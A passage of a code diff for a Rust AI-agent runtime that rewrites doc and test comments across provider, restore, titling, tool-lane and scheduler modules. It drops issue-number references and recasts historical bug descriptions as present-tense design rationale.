+    /// names the entry and the option.
     pub fn from_creds(
         creds: &ProviderCreds,
     ) -> Result<Option<Self>, leviath_providers::ProviderError> {
@@ -278,14 +278,14 @@ const OLLAMA_DEFAULT_PORT: u16 = 11434;
 ///
 /// Ollama is the one provider with nothing to check: every other entry
 /// registers only when it has an API key, and a key is a cheap stand-in for
-/// "the user configured this". Ollama needs no key, so it used to register
-/// unconditionally, and an install with no local server still advertised a
-/// working provider. Blueprint order then sent stages to a localhost port
-/// nothing answered on.
+/// "the user configured this". Ollama needs no key, so registering it
+/// unconditionally makes an install with no local server advertise a working
+/// provider, and blueprint order then sends stages to a localhost port nothing
+/// answers on.
 ///
 /// A connect is the equivalent cheap stand-in: it does not prove Ollama is
 /// there, only that the address is not dead, which is exactly the case that
-/// was misreporting. The timeout is deliberately short - this runs while the
+/// misreports. The timeout is deliberately short - this runs while the
 /// daemon is starting, and a loopback address either answers immediately or
 /// is not there at all.
 pub fn tcp_reachable(base_url: &str) -> bool {

--- a/crates/leviath-runtime/src/providers.rs
+++ b/crates/leviath-runtime/src/providers.rs
@@ -93,9 +93,9 @@ impl ProviderRegistry {
     /// models, before the first inference asks.
     ///
     /// Bounded and never fatal. A provider that cannot reach its API keeps its
-    /// built-in table, which is exactly the behaviour that existed before any
-    /// of this, so the worst case is the old answer rather than a daemon that
-    /// will not start. `timeout` covers each provider separately: this runs on
+    /// built-in table, so the worst case is a stale capability list rather
+    /// than a daemon that will not start. `timeout` covers each provider
+    /// separately: this runs on
     /// the start-up path, and an unreachable endpoint must cost a bounded wait
     /// rather than however long a connect takes to give up.
     ///
@@ -106,7 +106,7 @@ impl ProviderRegistry {
     /// not a run touches one; priming the ones a caller has actually named
     /// costs a compile of a script that is about to be used anyway, and it is
     /// what lets that provider answer [`Provider::serves_model`] and so win an
-    /// open route (issue #598).
+    /// open route.
     pub async fn prime_capabilities(&self, timeout: std::time::Duration, also: &[&str]) {
         let mut targets: Vec<(String, Arc<dyn Provider>)> = self
             .providers
@@ -316,9 +316,9 @@ impl ProviderRegistry {
     ///
     /// This is what an *enumeration* wants - "list every model I can reach" -
     /// where [`provider_names`](Self::provider_names) answers "what is
-    /// registered". Building the list on `provider_names` alone is what hid
-    /// script providers from `lev models list` (#523) and then, in the same
-    /// shape, from `GET /api/models` (#531).
+    /// registered". An enumeration built on `provider_names` alone silently
+    /// omits every script provider, which is what `lev models list` and
+    /// `GET /api/models` both need from here.
     ///
     /// A script name here is a candidate: [`get`](Self::get) compiles it on
     /// demand and returns `None` if it will not load, so a caller iterating
@@ -479,9 +479,9 @@ mod tests {
     }
 
     /// What an *enumeration* needs, and what `provider_names` cannot give it:
-    /// the script providers too. Building `GET /api/models` and
-    /// `lev models list --remote` on `provider_names` is what hid them
-    /// (issues #523, #531).
+    /// the script providers too. `GET /api/models` and
+    /// `lev models list --remote` both read this list, so a script provider
+    /// has to appear in it.
     #[test]
     fn resolvable_names_adds_the_script_layer_without_duplicating_a_native() {
         let dir = tempfile::tempdir().unwrap();
@@ -767,7 +767,7 @@ mod tests {
     }
 
     /// Priming reaches the script provider a machine names as its default, so
-    /// it can answer what it serves on the synchronous resolve path (#598).
+    /// it can answer what it serves on the synchronous resolve path.
     /// A script provider is compiled on demand rather than enumerated, so the
     /// ones on disk are invisible to the loop above. The machine's default is
     /// reached the same way priming reaches it - otherwise a run whose models

--- a/crates/leviath-runtime/src/restore.rs
+++ b/crates/leviath-runtime/src/restore.rs
@@ -14,7 +14,7 @@
 //! reconstructs its assistant turn in the window first - real journaled results
 //! for calls that completed, a verify-first [`INTERRUPTED_TOOL_RESULT`] for calls
 //! that didn't - so the re-issued inference sees exactly what already ran and
-//! completed side effects never run twice (issue #96).
+//! completed side effects never run twice.
 
 use bevy_ecs::prelude::*;
 use leviath_core::region::RegionEntry;
@@ -205,12 +205,11 @@ pub fn restore_agent(
 /// [`StageLedger`](crate::pipeline::StageLedger) **by stage name**.
 ///
 /// Nothing else rebuilds this. `spawn_agent` seeds one all-zero record per
-/// blueprint stage, so without this a reloaded run came back with no tokens, no
+/// blueprint stage, so without this a reloaded run comes back with no tokens, no
 /// `entered` flags and no timestamps against any stage - and since the persist
-/// tick writes the whole ledger, the next one wrote those zeros over the real
-/// `stages.json`. The run-level totals in `meta.json` survived that, so the run
-/// looked healthy while `lev stages` and the stages API served zeroed records
-/// (issue #415).
+/// tick writes the whole ledger, the next one writes those zeros over the real
+/// `stages.json`. The run-level totals in `meta.json` survive that, so the run
+/// looks healthy while `lev stages` and the stages API serve zeroed records.
 ///
 /// The seeded shape wins: a persisted record whose stage the blueprint no longer
 /// has is dropped, and a stage with no persisted record keeps its zeroed one.
@@ -282,7 +281,7 @@ fn interrupted_result(tool_name: &str, children: &[String]) -> String {
 /// finished, [`INTERRUPTED_TOOL_RESULT`] for calls that didn't. The turn is
 /// always fully paired, so the request assembler's orphan sanitizer keeps it,
 /// and the re-issued inference sees precisely what already ran instead of
-/// blindly re-executing the whole batch (issue #96).
+/// blindly re-executing the whole batch.
 ///
 /// Call after [`restore_agent`], which swaps the restored stage's
 /// `ToolResultRoutingComponent` in - the routing and per-tool sensitivities are
@@ -510,10 +509,10 @@ mod tests {
         assert_eq!(taint.entry_taint(1), Some(TaintLevel::Public));
     }
 
-    /// The per-stage ledger was the one piece of persisted state nothing
-    /// rebuilt, so a reloaded run came back with every stage at zero - and
-    /// because the persist tick rewrites `stages.json` whole, the next one
-    /// wrote those zeros over the run's real history (issue #415).
+    /// The per-stage ledger has to be rebuilt on restore. Without it a
+    /// reloaded run comes back with every stage at zero, and because the
+    /// persist tick rewrites `stages.json` whole, the next one writes those
+    /// zeros over the run's real history.
     /// The raised output cap survives a restart through the ledger: the
     /// per-stage counters are rebuilt from zero, and this is the one that must
     /// not be.
@@ -656,7 +655,7 @@ mod tests {
         assert!(world.get::<ReadyToInfer>(entity).is_some());
     }
 
-    // ── pending-batch replay (#96) ──
+    // ── pending-batch replay ──
 
     fn pending_call(
         id: &str,

--- a/crates/leviath-runtime/src/script_provider.rs
+++ b/crates/leviath-runtime/src/script_provider.rs
@@ -15,11 +15,10 @@
 //! - a broken script → not resolved (logged), so selection falls through.
 //!
 //! The `[model_providers.<name>]` table that feeds a script's `initialize` is
-//! read the same way, through a [`ScriptProviderConfig`] source the layer calls
-//! on every lookup rather than a copy taken at boot. It used to be a copy, so
-//! editing a provider's `base_url` did nothing until `lev daemon restart` while
-//! editing the script beside it took effect immediately - two halves of one
-//! feature disagreeing, silently (issue #533).
+//! read the same way: through a [`ScriptProviderConfig`] source the layer calls
+//! on every lookup, never a copy taken at boot. Both halves have to be live or
+//! the feature disagrees with itself: a changed `base_url` would wait for a
+//! daemon restart while a changed script beside it took effect at once.
 //!
 //! [`ProviderRegistry`]: crate::ProviderRegistry
 
@@ -70,9 +69,9 @@ pub struct ScriptProviderConfig {
 /// A cached, compiled script provider, plus what it was built from.
 ///
 /// Both halves matter. The mtime catches an edited script; the config catches
-/// an edited `[model_providers]` entry, which used to leave a stale provider
-/// cached under an unchanged file (issue #533). Compared by pointer, so a
-/// source that returns the same `Arc` while nothing has changed costs nothing.
+/// an edited `[model_providers]` entry, which leaves the script file's mtime
+/// untouched. Compared by pointer, so a source that returns the same `Arc`
+/// while nothing has changed costs nothing.
 struct Cached {
     mtime: SystemTime,
     config: Arc<ScriptProviderConfig>,
@@ -417,10 +416,10 @@ mod tests {
         ScriptProviderLayer::new(dir, HashMap::new(), HashMap::new(), None, Vec::new())
     }
 
-    /// The half of the feature that was frozen: the script file hot-reloads,
-    /// but its `[model_providers.<name>]` table was captured at boot, so
-    /// changing a `base_url` did nothing until a daemon restart - silently,
-    /// with the run using the old value (issue #533).
+    /// The half of the feature that is easy to freeze: the script file
+    /// hot-reloads on its own mtime, but its `[model_providers.<name>]` table
+    /// has no mtime anyone watches, so it has to be re-read per lookup or a
+    /// changed `base_url` waits, silently, for a daemon restart.
     ///
     /// The script here reports its `base_url` as a model id, so what the
     /// provider was initialized with is directly observable.
@@ -479,15 +478,14 @@ mod tests {
     }
 
     /// A machine whose `default_provider` is a script provider can win an open
-    /// route, which is the whole of issue #598.
+    /// route.
     ///
-    /// The failing shape: a local box serves one fast model, every bundled
-    /// blueprint names that model with no provider, and the run goes remote
-    /// anyway. `native_providers` does not enumerate script providers - they
-    /// are compiled on demand - so the open route was offered to every built-in
-    /// and never to the one the user had actually chosen. Setting
-    /// `default_provider` changed nothing, because there was no route it was
-    /// eligible to win.
+    /// The shape that makes this delicate: `native_providers` does not
+    /// enumerate script providers, since they are compiled on demand, so an
+    /// open route is offered to every built-in and to no script unless the
+    /// named default is reached explicitly. Without that, a local box serving
+    /// the one fast model every bundled blueprint asks for by bare id never
+    /// gets the route, and setting `default_provider` changes nothing.
     #[tokio::test]
     async fn a_script_provider_named_as_default_can_answer_what_it_serves() {
         let dir = tempfile::tempdir().unwrap();

--- a/crates/leviath-runtime/src/telemetry/tests.rs
+++ b/crates/leviath-runtime/src/telemetry/tests.rs
@@ -288,7 +288,7 @@ fn completion_empty_output(flags: Option<crate::persistence::RunOutcomeFlags>) -
 }
 
 /// Whether a finished run produced anything rides along with the completion,
-/// so a collector can chart the rate rather than only find it on disk (#192).
+/// so a collector can chart the rate rather than only find it on disk.
 #[test]
 fn a_completion_reports_whether_the_run_produced_anything() {
     // No flags component at all: nothing to report, so no verdict is invented.

--- a/crates/leviath-runtime/src/title.rs
+++ b/crates/leviath-runtime/src/title.rs
@@ -72,14 +72,13 @@ pub struct PendingTitle;
 /// `collect_title` re-arms [`PendingTitle`] so the next one is tried. Empty
 /// means every candidate has been spent.
 ///
-/// This exists because the title call used to have exactly one shot at exactly
-/// one provider - the head of the run's own chain - while the stage lane behind
-/// it retried and then failed over across the blueprint's whole model list. So
-/// an account that was over its limit on one gateway produced runs whose stages
-/// all completed (they failed over) and whose names never appeared (the title
-/// call took the 403 and gave up). The chain is the same one stage inference
-/// walks, for the same reason: the run has a name to generate and several ways
-/// to generate it.
+/// A chain rather than one shot at the head of the run's own chain. The stage
+/// lane retries and then fails over across the blueprint's whole model list, so
+/// an account over its limit on one gateway would otherwise produce runs whose
+/// stages all completed and whose names never appeared, the title call having
+/// taken the 403 and given up. The chain here is the one stage inference walks,
+/// for the same reason: the run has a name to generate and several ways to
+/// generate it.
 #[derive(Component, Debug, Clone, Default, PartialEq, Eq)]
 pub struct TitleCandidates(pub Vec<(String, String)>);
 
@@ -98,10 +97,10 @@ pub(crate) struct AwaitingTitle(pub i64);
 ///
 /// A terminal run is unloaded from memory a pass after it finishes, and a title
 /// landing on an unloaded run is dropped - reason and all. A run that ends
-/// quickly therefore used to race its own title and usually win: a probe making
-/// two provider calls lost even a single 50ms retry. So the host holds a
-/// finished run resident while the title lane still has a live claim on it, and
-/// this is how long that claim lasts.
+/// quickly therefore races its own title and wins: a probe making two provider
+/// calls beats even a single 50ms retry. So the host holds a finished run
+/// resident while the title lane still has a live claim on it, and this is how
+/// long that claim lasts.
 ///
 /// Measured from the run's *start* rather than from the moment it finished, so
 /// the bound cannot be stretched by a run that ends early: whatever happens, a
@@ -335,16 +334,13 @@ fn sanitize_title(raw: &str) -> String {
     // the display cap, and reasoning does not.
     //
     // A reply with no line that fits has no title in it, so this returns
-    // nothing and the run keeps showing its task text. It used to fall back to
-    // the first line *truncated*, which is how a run came to be titled "We
-    // need to generate a short title for the user's request. The user wants to
-    // buil" - one unbroken paragraph of reasoning, cut at exactly the display
-    // cap. Truncating prose does not make it a title; it only hides that this
-    // failed.
+    // nothing and the run keeps showing its task text. Falling back to the
+    // first line *truncated* is not an option: truncating prose does not make
+    // it a title, it only hides that this failed.
     let stripped = strip_reasoning(raw);
     // Compared in bytes, which is what the cap is in. Counting chars here and
-    // cutting bytes afterwards meant a title of 80 CJK characters passed the
-    // check and was then sliced mid-title.
+    // cutting bytes afterwards lets a title of 80 CJK characters pass the check
+    // and then be sliced mid-title.
     stripped
         .lines()
         .map(strip_control_tokens)
@@ -475,11 +471,10 @@ fn strip_reasoning(raw: &str) -> String {
 
 /// Record why this run has no name, on the run itself.
 ///
-/// The reason used to go to `tracing::debug!` alone, in a daemon whose
-/// stdout is `/dev/null` - so "titling failed" and "titling never ran" looked
-/// identical from outside, which is how a broken title call survived a whole
-/// day of runs unnoticed. It is a `warn!` *and* a field on the run now: the log
-/// is for whoever is watching, the field is for everyone who was not.
+/// A `warn!` *and* a field on the run. The daemon's stdout is `/dev/null`, so a
+/// reason that reaches only the log leaves "titling failed" and "titling never
+/// ran" identical from outside: the log is for whoever is watching, the field is
+/// for everyone who was not.
 fn record_title_failure(meta: &mut RunMetadata, reason: String) {
     tracing::warn!(
         run_id = %meta.run_id,
@@ -1965,9 +1960,9 @@ mod tests {
         let req = title_request(&long_task, "openai", "gpt-5-mini");
         assert_eq!(req.model, "gpt-5-mini");
         assert_eq!(req.max_tokens, TITLE_MAX_TOKENS);
-        // One message, the task. This used to assert two, pinning the shape
-        // that Anthropic rejects - the test agreed with the code and both were
-        // wrong, which is how titling shipped broken for the default provider.
+        // One message, the task. The instruction rides in a system block, not
+        // a second message, because Anthropic rejects any role but user and
+        // assistant in `messages`.
         assert_eq!(req.messages.len(), 1);
         let expected: leviath_providers::MessageContent =
             leviath_core::truncate_at_boundary(&long_task, TITLE_TASK_BUDGET)
@@ -2014,10 +2009,9 @@ mod tests {
     ///
     /// Anthropic's Messages API accepts only `user` and `assistant` roles in
     /// `messages` and rejects anything else with a 400, and it is the default
-    /// provider for every blueprint Leviath ships. So the old shape meant no
-    /// run ever got a title, and nothing said so: a failed title is
-    /// deliberately not worth interrupting a run for, and the reason reached
-    /// only a debug log in a daemon whose output goes to /dev/null.
+    /// provider for every blueprint Leviath ships. Getting this wrong costs
+    /// every run its name quietly: a failed title is deliberately not worth
+    /// interrupting a run for.
     #[test]
     fn the_title_request_carries_its_instruction_as_a_system_block() {
         let request = title_request("tidy the kitchen", "anthropic", "claude-sonnet-4-6");
@@ -2065,11 +2059,10 @@ mod tests {
         assert_eq!(sanitize_title(&brim), brim);
     }
 
-    /// The bug this module was rewritten for. A reasoning model that never
-    /// reaches its answer returns one unbroken paragraph of working-out, so
-    /// there is no short line to prefer - and the old code fell back to the
-    /// first line *truncated*, which is how a run came to be titled with the
-    /// model's own thinking, cut at exactly the display cap.
+    /// A reasoning model that never reaches its answer returns one unbroken
+    /// paragraph of working-out, so there is no short line to prefer. Falling
+    /// back to the first line *truncated* would title the run with the model's
+    /// own thinking, cut at exactly the display cap.
     ///
     /// Truncating prose does not make it a title. Nothing is stored, and the
     /// run keeps showing the task the user typed.
@@ -2081,9 +2074,8 @@ mod tests {
         assert!(leaked.len() > TITLE_MAX_LEN);
         assert_eq!(sanitize_title(leaked), "");
 
-        // What the old fallback made of it, and what a dashboard displayed:
-        // the same prose cut at exactly the cap, which is why the stored title
-        // was 80 bytes to the byte. Nothing here is allowed to produce it.
+        // What a truncating fallback makes of it: the same prose cut at
+        // exactly the cap. Nothing here is allowed to produce it.
         let truncated = leviath_core::truncate_at_boundary(leaked, TITLE_MAX_LEN);
         assert_eq!(
             truncated,
@@ -2107,13 +2099,13 @@ mod tests {
         assert_eq!(sanitize_title(&short), short);
     }
 
-    /// The three chips from issue #587, verbatim as they were reported from a
-    /// live console, each proving one hole the display cap could not see.
+    /// Three replies verbatim from a live console, each one a hole the display
+    /// cap cannot see.
     ///
     /// All three are short, single-line, and free of reasoning tags, so the
-    /// earlier fix - "reasoning is longer than a title" - had nothing to say
-    /// about any of them. They were stored, and shown to a user as the names
-    /// of their runs.
+    /// "reasoning is longer than a title" rule has nothing to say about any of
+    /// them. Without a separate check they are stored and shown to a user as
+    /// the names of their runs.
     #[test]
     fn sanitize_refuses_the_three_replies_that_were_shown_to_a_user() {
         // A chat-template control token, cut short exactly as it appeared.
@@ -2214,10 +2206,9 @@ mod tests {
         assert_eq!(sanitize_title("<reasoning>no closing tag here"), "");
     }
 
-    /// The title call bills like any other and used to be counted like none:
-    /// its outcome channel carried the reply the collector wanted and dropped
-    /// the usage nobody read, so a run's reported spend was short by one call
-    /// it had definitely made.
+    /// The title call bills like any other, so its usage has to ride the
+    /// outcome channel beside the reply the collector wants. Dropping it leaves
+    /// a run's reported spend short by one call it definitely made.
     #[test]
     fn a_title_call_is_counted_against_the_run_that_paid_for_it() {
         let mut world = World::new();

--- a/crates/leviath-runtime/src/title_bridge.rs
+++ b/crates/leviath-runtime/src/title_bridge.rs
@@ -9,9 +9,9 @@
 //!
 //! Titling is still best-effort in that it never fails the agent: the outcome
 //! carries a `Result`, and a run whose name could not be generated keeps
-//! showing its task text. What it is no longer is *silent* - the outcome's
-//! error reaches `collect_title`, which either moves the run to the next
-//! candidate provider or records why the run has no name.
+//! showing its task text. It is not *silent*, though: the outcome's error
+//! reaches `collect_title`, which either moves the run to the next candidate
+//! provider or records why the run has no name.
 
 use std::sync::Arc;
 
@@ -68,12 +68,11 @@ pub(crate) struct TitleOutcome {
 ///
 /// `retry` is the same policy the dispatch lane uses, and for the same two
 /// reasons. Its schedule retries a transient refusal - a reset connection, a
-/// 429, a 5xx - instead of surrendering the run's name to one unlucky moment;
-/// this call used to be a single naked `infer`, so a provider having a bad
-/// minute left the run permanently untitled and said so only to a debug log.
+/// 429, a 5xx - instead of surrendering the run's name to one unlucky moment: a
+/// naked `infer` here leaves a run permanently untitled over one bad minute.
 /// Its `job_timeout` is the outer bound: the permit must be released within a
 /// fixed time even when the provider's own timer is missing (script providers)
-/// or defeated. A hung title call once held its pool slot forever.
+/// or defeated, or a hung title call holds its pool slot forever.
 pub(crate) async fn run_title_job(
     job: TitleJob,
     retry: crate::inference_bridge::RetryPolicy,

--- a/crates/leviath-runtime/src/tool_bridge.rs
+++ b/crates/leviath-runtime/src/tool_bridge.rs
@@ -13,13 +13,13 @@
 //! each task holds a permit for as long as it is executing, so
 //! `max_concurrent_tools` batches run at a time.
 //!
-//! It used to be a fixed pool of worker tasks, and that deadlocked. Several
-//! things a batch can await have no time bound at all: a tool-approval prompt, an
-//! `ask_user`, a `wait_for_agent` poll that only ends when some other run
-//! finishes. A worker sitting in one of those was a unit of capacity spent on
-//! waiting rather than working, and a parent waiting on a child it had spawned
-//! was holding capacity that child needed to finish. Eight of those and no
-//! agent's tools ran again, for as long as the daemon lived (issue #191).
+//! A fixed pool of worker tasks cannot do this job. Several things a batch can
+//! await have no time bound at all: a tool-approval prompt, an `ask_user`, a
+//! `wait_for_agent` poll that only ends when some other run finishes. A worker
+//! sitting in one of those is a unit of capacity spent on waiting rather than
+//! working, and a parent waiting on a child it spawned holds the capacity that
+//! child needs to finish. Enough of those and no agent's tools run again for
+//! the life of the daemon.
 //!
 //! A permit, unlike a worker, can be handed back in the middle of a batch. That
 //! is what [`off_lane`] does, and it is what makes the deadlock impossible:
@@ -240,10 +240,9 @@ impl ToolLane {
     ///
     /// The relief valve under a lane that has stopped draining: handing out more
     /// capacity lets the queued batches run without cancelling anything. Returns
-    /// how many were added. No longer "for good": once the jam is over,
-    /// [`Self::narrow`] hands the extra capacity back, so a single historical
-    /// wedge does not raise the daemon's peak concurrency (and with it, peak
-    /// memory) for the rest of its life.
+    /// how many were added. The extra is not permanent: once the jam is over,
+    /// [`Self::narrow`] hands it back, so one wedge does not raise the daemon's
+    /// peak concurrency (and with it, peak memory) for the rest of its life.
     pub(crate) fn relieve(&self, extra: usize) -> usize {
         if extra == 0 {
             return 0;
@@ -490,7 +489,7 @@ impl Drop for LaneTicket {
 /// this returns, so a batch waiting on a person (a tool-approval prompt, an
 /// `ask_user`) or on another run (`wait_for_agent`) occupies no capacity while it
 /// waits. That is what stops a lane full of waiters from starving the very runs
-/// they are waiting for (issue #191).
+/// they are waiting for.
 ///
 /// Outside a lane task - the embedded runtime, tests driving an executor
 /// directly - there is no ticket and this is just `fut.await`.
@@ -702,7 +701,7 @@ mod tests {
         assert!(h.outcomes.try_recv().is_err(), "no more outcomes");
     }
 
-    /// The issue #191 regression, at its narrowest.
+    /// The deadlock the permit design exists to rule out, at its narrowest.
     ///
     /// A one-wide lane, a batch parked on something only a *later* batch can
     /// deliver. With a fixed worker pool this is a deadlock: the waiter owns the

--- a/crates/leviath-runtime/src/world.rs
+++ b/crates/leviath-runtime/src/world.rs
@@ -62,9 +62,9 @@ use crate::tool_bridge::ToolLane;
 /// that: `enforce_max_iterations` swaps `ReadyToInfer` for `ResolveTransition` in
 /// the first chained group, and `resolve_transition` enters the next stage and
 /// re-arms `ReadyToInfer` in the second - one tick, a whole stage transition, and
-/// every count identical either side of it. The driver read that as quiescence
-/// and parked on an agent that no dispatch system had yet seen in its new stage,
-/// leaving the 30s re-drive to start the next stage (issue #197).
+/// every count identical either side of it. A driver reading that as quiescence
+/// parks on an agent no dispatch system has yet seen in its new stage, leaving
+/// the 30s re-drive to start the next stage.
 #[derive(Debug, Clone, Copy, PartialEq, Eq)]
 struct Fingerprint {
     /// How many agents hold each phase marker.
@@ -368,7 +368,7 @@ impl PipelineWorld {
         world.insert_resource(InferenceStage {
             // The wake goes into the pools, not just the bridges: freeing a slot
             // has to re-drive dispatch, or the agents parked on a full pool never
-            // learn that capacity came back (issue #189).
+            // learn that capacity came back.
             pools: Arc::new(InferencePools::new(pool_config).with_wake(wake.clone())),
             outcomes: inf_tx,
             transition_outcomes: trans_tx,
@@ -494,9 +494,9 @@ impl PipelineWorld {
                 // Nested for the 20-system `.chain()` limit, as the pairs
                 // below are. `require_fan_out` is the same shape for a fan_out
                 // stage trying to leave without having started any workers:
-                // starting them is the whole job of the stage, and a merge stage
-                // running on nothing used to be indistinguishable from one
-                // running on a genuinely empty fan-out.
+                // starting them is the whole job of the stage, and a merge
+                // stage running on nothing is otherwise indistinguishable from
+                // one running on a genuinely empty fan-out.
                 (require_final_output, require_fan_out),
                 // Intercept a would-be transition for an interactive-points stage
                 // (e.g. plan_approval) and drive the interaction-point lane.
@@ -830,7 +830,7 @@ impl PipelineWorld {
     /// Providers currently taken out of service by their circuit breaker.
     ///
     /// Empty when the breaker is not installed, so an embedded world that never
-    /// inserted the resource simply reports nothing wrong (issue #201).
+    /// inserted the resource simply reports nothing wrong.
     pub(crate) fn open_circuits(&self) -> Vec<crate::pipeline::ProviderCircuitState> {
         let Some(circuits) = self
             .world
@@ -846,8 +846,8 @@ impl PipelineWorld {
         circuits.open_circuits(chrono::Utc::now().timestamp(), &policy)
     }
 
-    /// This is the answer to "the daemon has been quiet for hours - is anything
-    /// actually running?", which issue #189 had no way to ask.
+    /// The answer to "the daemon has been quiet for hours - is anything
+    /// actually running?", which no per-run view can give.
     pub(crate) fn lane_snapshot(&self) -> LaneSnapshot {
         let mut agents = AgentCounts::default();
         for state in self
@@ -1115,17 +1115,11 @@ fn run_isolated(schedule: &mut Schedule, world: &mut World) -> Result<(), TickPa
 /// system up to and including the offending one marked done, so the **next**
 /// tick silently skips them and only runs the tail of the chain - a partial
 /// tick that would, among other things, keep `dispatch_persistence` from ever
-/// seeing an agent we just failed. Swapping the executor kind and back is the
-/// public API for forcing a rebuild.
-///
-/// One call suffices on bevy_ecs 0.19: `set_executor` takes an executor
+/// seeing an agent we just failed. Replacing the executor outright is the
+/// public API for forcing that rebuild: `set_executor` takes an executor
 /// *instance* and unconditionally replaces `schedule.executor` with it (clearing
 /// `executor_initialized` too), so the fresh `SingleThreadedExecutor` arrives
 /// with an empty `completed_systems`.
-///
-/// On 0.15 this had to set two different *kinds* and swap back, because
-/// `set_executor_kind` was a no-op when the kind was unchanged - and
-/// `SimpleExecutor`, the other kind it used, no longer exists.
 fn reset_executor(schedule: &mut Schedule) {
     schedule.set_executor(bevy_ecs::schedule::SingleThreadedExecutor::new());
 }
@@ -1527,7 +1521,7 @@ mod tests {
         // pool, where the thread-local scope can't reach the driver thread that
         // catches unwinds. Those bodies run under `run_agent_parallel`, which
         // catches on the pool thread and marks the agent instead - this proves
-        // the marker makes it back and fails the right run (issue #109).
+        // the marker makes it back and fails the right run.
         fn boom_in_parallel(
             agents: Query<(Entity, &AgentState)>,
             par_commands: bevy_ecs::system::ParallelCommands,
@@ -1570,11 +1564,11 @@ mod tests {
 
     #[tokio::test]
     async fn a_panicking_system_fails_its_agent_instead_of_looping_forever() {
-        // Before issue #109 was fixed, a panicking system was swallowed
-        // anonymously: nothing changed, so the very next wake re-ticked the same
-        // state and panicked again, forever, while every other agent stalled.
-        // Now the agent in scope is failed, which takes it out of the dispatch
-        // systems (they only act on `Active` agents) and lets the world settle.
+        // A panicking system swallowed anonymously changes nothing, so the
+        // very next wake re-ticks the same state and panics again, forever,
+        // while every other agent stalls. Failing the agent in scope takes it
+        // out of the dispatch systems (they only act on `Active` agents) and
+        // lets the world settle.
         static VICTIM: std::sync::Mutex<Option<Entity>> = std::sync::Mutex::new(None);
         static PANICS: std::sync::atomic::AtomicUsize = std::sync::atomic::AtomicUsize::new(0);
 
@@ -1636,12 +1630,12 @@ mod tests {
 
     #[tokio::test]
     async fn an_agent_whose_provider_is_missing_wedges_at_iteration_zero() {
-        // Issue #190. The registry has no `script` provider, so
-        // `dispatch_inference` declines and leaves the agent `ReadyToInfer`.
-        // Nothing about the world changed, so the fixed point is reached
-        // immediately and nothing is in flight to wake the driver - the agent
-        // used to sit `Active` at iteration 0 for ever, which on disk reads as
-        // a `running` run with no tokens and a frozen `updated_at`.
+        // The registry has no `script` provider, so `dispatch_inference`
+        // declines and leaves the agent `ReadyToInfer`. Nothing about the world
+        // changed, so the fixed point is reached immediately and nothing is in
+        // flight to wake the driver - unnoticed, the agent sits `Active` at
+        // iteration 0 for ever, which on disk reads as a `running` run with no
+        // tokens and a frozen `updated_at`.
         let mut world = build_world(ProviderRegistry::new());
         let e = spawn(&mut world);
 
@@ -1691,7 +1685,7 @@ mod tests {
         );
     }
 
-    /// Issue #202, end to end through the real schedule: an agent stripped of
+    /// End to end through the real schedule: an agent stripped of
     /// every phase marker is unreachable, and the watchdog registered in the
     /// chain above fails it rather than leaving it `running` for ever.
     ///
@@ -1765,7 +1759,7 @@ mod tests {
 
     #[tokio::test]
     async fn agent_nudge_max_bounds_the_loop_end_to_end() {
-        // `[agent.nudge] max = 1` (issue #127): the second text-only response
+        // `[agent.nudge] max = 1`: the second text-only response
         // is final, so a two-response script finishes where the default cap
         // would have demanded four. A third scripted response left unconsumed
         // would keep the driver looping past run_until_idle's budget.
@@ -2100,9 +2094,9 @@ mod tests {
 
     #[tokio::test]
     async fn resume_resets_the_provider_circuits() {
-        // Issue #413: a run paused on exhausted credits comes back through an
-        // explicit resume. If the breaker kept its state, the retry would sit
-        // out the rest of the cooldown and the resume would look ignored.
+        // A run paused on exhausted credits comes back through an explicit
+        // resume. If the breaker kept its state, the retry would sit out the
+        // rest of the cooldown and the resume would look ignored.
         let mut world = build_world(registry_with(vec![text("t1")]));
         let e = spawn(&mut world);
         assert!(world.pause(e));
@@ -2127,7 +2121,7 @@ mod tests {
         assert!(world.open_circuits().is_empty());
     }
 
-    /// #576: a cancelled agent is stopped, not finished, so an explicit resume
+    /// A cancelled agent is stopped, not finished, so an explicit resume
     /// puts it back to work. Nothing else does: it stays stopped until asked.
     #[tokio::test]
     async fn resume_restarts_a_cancelled_agent() {
@@ -2360,8 +2354,8 @@ mod tests {
 
     #[tokio::test]
     async fn a_panicked_agent_is_recorded_as_errored_on_disk() {
-        // The reported symptom in issue #109: a crashed run stayed `"running"`
-        // in meta.json forever. `dispatch_persistence` is the *last* system in
+        // A crashed run must not be left `"running"` in meta.json forever.
+        // `dispatch_persistence` is the *last* system in
         // the chain, so the tick that panics never reaches it - which is exactly
         // why `run_to_fixed_point` keeps driving after failing the agent.
         fn boom_on_active_agent(agents: Query<(Entity, &AgentState)>) {
@@ -2478,7 +2472,7 @@ mod tests {
     async fn persists_interaction_point_when_a_live_agent_blocks() {
         // Drive a real agent through inference → transition → the interaction-point
         // lane until it blocks awaiting approval, and assert the daemon wrote the
-        // `interactions.json` sidecar - the issue #38 persist side, end-to-end
+        // `interactions.json` sidecar - the persist side, end-to-end
         // through the live lane (a tool call first, then a text "plan", so the stage
         // transitions into the interaction point rather than looping on nudges).
         let dir = tempfile::tempdir().unwrap();
@@ -2988,13 +2982,13 @@ mod tests {
         assert_eq!(b.agent_status(in_b), before);
     }
 
-    /// The hazard [`AgentId`] exists for, now closed.
+    /// The hazard [`AgentId`] exists for.
     ///
     /// The raw entities still collide - that is a property of bevy, not
     /// something this can change - but an [`AgentId`] carries the world that
-    /// minted it, so the collision no longer means the two name the same agent.
-    /// Before this, `b.pause(a_entity)` paused B's own agent while the caller
-    /// believed it had paused A's, silently.
+    /// minted it, so a collision does not mean the two name the same agent.
+    /// Without that, `b.pause(a_entity)` pauses B's own agent while the caller
+    /// believes it has paused A's, silently.
     #[tokio::test]
     async fn a_foreign_agent_id_is_refused_rather_than_naming_the_wrong_agent() {
         let mut a = build_world(ProviderRegistry::new());

--- a/crates/leviath-runtime/src/world/control.rs
+++ b/crates/leviath-runtime/src/world/control.rs
@@ -61,7 +61,7 @@ impl PipelineWorld {
     /// Resume a paused agent. `Idle` is also accepted (resume-as-nudge for an
     /// agent that has not ticked yet), and so is `Cancelled`: cancelling stops a
     /// run rather than ending it, and everything it needs to carry on is still
-    /// on disk (#576). Anything else returns `false`.
+    /// on disk. Anything else returns `false`.
     pub(crate) fn resume(&mut self, agent: AgentId) -> bool {
         // Resolved once, up front. Doing it again inside the arm below would
         // be a second check that cannot fail - the status lookup already
@@ -73,9 +73,9 @@ impl PipelineWorld {
         match self.agent_status(agent) {
             Some(AgentStatus::Paused | AgentStatus::Idle | AgentStatus::Cancelled) => {
                 // An explicit resume says conditions have changed - most often
-                // a top-up after a run paused on exhausted credits (issue
